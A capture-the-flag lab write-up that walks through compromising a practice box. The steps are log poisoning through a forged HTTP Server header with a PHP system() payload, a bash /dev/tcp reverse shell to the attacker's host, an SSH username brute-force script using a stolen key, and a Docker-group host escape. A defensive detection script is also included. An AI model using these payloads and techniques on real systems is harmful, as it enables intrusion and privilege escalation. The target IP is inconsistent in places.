Difficulty: medium

Kali: 192.168.0.106

Target: 192.168.56.101

Port scan

root@kali2 [~] ➜  nmap 192.168.0.101                         [11:39:56]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 11:39 CST
Nmap scan report for point.nyx (192.168.0.101)
Host is up (0.000090s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Log RCE

/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 10701]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
/Anonymous-Connections (Status: 301) [Size: 330] [--> http://192.168.0.101/Anonymous-Connections/]

From the result it is clear that this is an nmap scan.

/victims              (Status: 301) [Size: 338] [--> http://192.168.0.101/Anonymous-Connections/victims/]

Scanning that directory again turns up the log directory.
So at this point someone will ask: streamer, streamer, will this log get parsed by PHP?
Yes it will, yes it will. Pick any field from the scan result and try changing it, so I tried changing the HTTP Server header SimpleHTTPServer 0.6 (Python 3.11.9)

from http.server import HTTPServer, SimpleHTTPRequestHandler

class CustomHandler(SimpleHTTPRequestHandler):
    # The Server header value the scanner writes into the log; a PHP tag here
    # tests whether the .log file is executed as PHP when viewed.
    server_version = "<?php phpinfo();?>"
    # Empty so no "Python/x.y" suffix is appended to the Server header.
    sys_version = ""

httpd = HTTPServer(("0.0.0.0", 80), CustomHandler)
print("Serving on port 80...")
httpd.serve_forever()

Checking the log again confirms it is parsed, so next a reverse shell.

from http.server import HTTPServer, SimpleHTTPRequestHandler

class CustomHandler(SimpleHTTPRequestHandler):
    # Same trick as above, but the logged Server header now runs whatever is
    # passed in GET parameter "1" when the .log file is requested.
    server_version = "<?php system($_GET[1]);?>"
    # Empty so no "Python/x.y" suffix is appended to the Server header.
    sys_version = ""

httpd = HTTPServer(("0.0.0.0", 80), CustomHandler)
print("Serving on port 80...")
httpd.serve_forever()

http://192.168.0.101/Anonymous-Connections/victims/192.168.0.106.log?1=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.106%2F4567%20%200%3E%261%27
hacktivist@debian1:/var/www/html$ cat .htaccess 
AddType application/x-httpd-php .log

This is why the .log files get parsed as PHP.
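As an added defender-side check (not part of the original writeup), the following Python script flags the misconfiguration above, an AddType/AddHandler line that hands a non-PHP extension such as .log to the PHP handler, and separately scans log data for the PHP open tag that a poisoned Server header leaves behind. The sample .htaccess and log lines are constructed for the demo.

```python
import re

# Handler and MIME names that make Apache pass a file to PHP (mod_php or FPM).
PHP_HANDLER = re.compile(r"application/x-httpd-php|php\d*-script|php-fpm", re.I)
# PHP open tags; their presence in log data is the poisoning signature.
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.I)
# Extensions that are expected to run as PHP; any other mapping is a finding.
EXPECTED_PHP_EXT = {".php", ".phtml"}


def risky_php_mappings(config_text):
    """Return (directive, extension) pairs from AddType/AddHandler lines that
    map a non-PHP extension (.log, .txt, ...) to a PHP handler."""
    findings = []
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        parts = line.split()
        if len(parts) < 3 or parts[0].lower() not in ("addtype", "addhandler"):
            continue
        if not PHP_HANDLER.search(parts[1]):
            continue
        for ext in parts[2:]:
            ext = ext.lower()
            ext = ext if ext.startswith(".") else "." + ext
            if ext not in EXPECTED_PHP_EXT:
                findings.append((parts[0], ext))
    return findings


def poisoned_log_lines(log_text):
    """Return (line_no, line) for entries containing a PHP open tag, i.e. data
    that reached the log through a client-controlled header or request field."""
    return [(n, line) for n, line in enumerate(log_text.splitlines(), 1)
            if PHP_TAG.search(line)]


# Constructed sample input: the .htaccess line from this box plus two harmless
# directives, and three made-up log entries in a "client server-header" layout.
SAMPLE_HTACCESS = """\
# .htaccess as found in the webroot on this box
AddType application/x-httpd-php .log
AddType application/x-httpd-php .php
AddHandler text/plain .txt
"""
SAMPLE_LOG = """\
192.168.0.106 SimpleHTTPServer 0.6 (Python 3.11.9)
192.168.0.106 <?php phpinfo();?>
192.168.0.106 Apache/2.4 (Debian)
"""

if __name__ == "__main__":
    for directive, ext in risky_php_mappings(SAMPLE_HTACCESS):
        print(f"[!] {directive} maps {ext} to PHP; such files will execute")
    for n, line in poisoned_log_lines(SAMPLE_LOG):
        print(f"[!] log line {n} carries a PHP tag: {line}")
```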

hacktivist@debian1:/home/hacktivist$ cat .bash_history 
 
hacktivist@debian1:/home/hacktivist$ cat .sudo_as_admin_successful 
hacktivist@debian1:/home/hacktivist$ sudo -l
Matching Defaults entries for hacktivist on debian1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User hacktivist may run the following commands on debian1:
    (ALL : ALL) NOPASSWD: ALL
hacktivist@debian1:/home/hacktivist$ sudo su

But what we landed in is a Docker container, so scan the internal network.

{icmp} 10.10.10.1      up
{icmp} 10.10.10.10     up
{icmp} 10.10.10.20     up

There are three machines; the current one is .10. Set up a tunnel and take a look at each of them.
10.10.10.1 is the same as the external-facing host; attack it the same way again to get into that machine.

SSH brute force + Docker escape

 root@debian1:~# cat .bash_history 
echo 'root:$uP3r_$3cUr3_D0ck3r' | chpasswd
cd
nano .bash_history 
exit

Got a password, presumably for the .20 machine. A scan shows its SSH port is 2222.

root@debian2:~/.ssh# cat id_rsa 
-----BEGIN RSA PRIVATE KEY-----
[key contents omitted]
-----END RSA PRIVATE KEY-----

Got a private key, so brute-force the username.
A script borrowed from the group chat brute-forced the username alfredo.

#!/bin/bash

host=192.168.0.101
user_file=/usr/share/seclists/Usernames/Names/names.txt
id_rsa_file=/tmp/aaa

# Try each name with the recovered key. -n keeps ssh from swallowing the rest
# of the name list on stdin; BatchMode stops it from hanging on a password
# prompt, and StrictHostKeyChecking=no skips the host-key confirmation.
while read -r i
do
    if timeout 1 ssh -n -o BatchMode=yes -o StrictHostKeyChecking=no \
            -i "$id_rsa_file" "${i}@${host}" id &>/dev/null; then
        echo "[+]Found: $i"
        break
    else
        echo "[-]test:  $i"
    fi
    sleep 0.1
done < "$user_file"

alfredo@anon:~$ cat user.txt 
af13f20ce2fb4266b4d381cf8f60f85f
alfredo@anon:~$ id
uid=1000(alfredo) gid=1000(alfredo) grupos=1000(alfredo),109(docker)

Now the Docker escape.

alfredo@anon:~$ docker images
REPOSITORY   TAG       IMAGE ID       CREATED        SIZE
debian2      latest    8862ed54f766   43 hours ago   117MB
debian1      latest    62c15a42ee05   43 hours ago   117MB
debian       latest    18f9bd665a29   3 days ago     117MB
alfredo@anon:~$ docker run -v /:/mnt --rm -it debian2 chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root)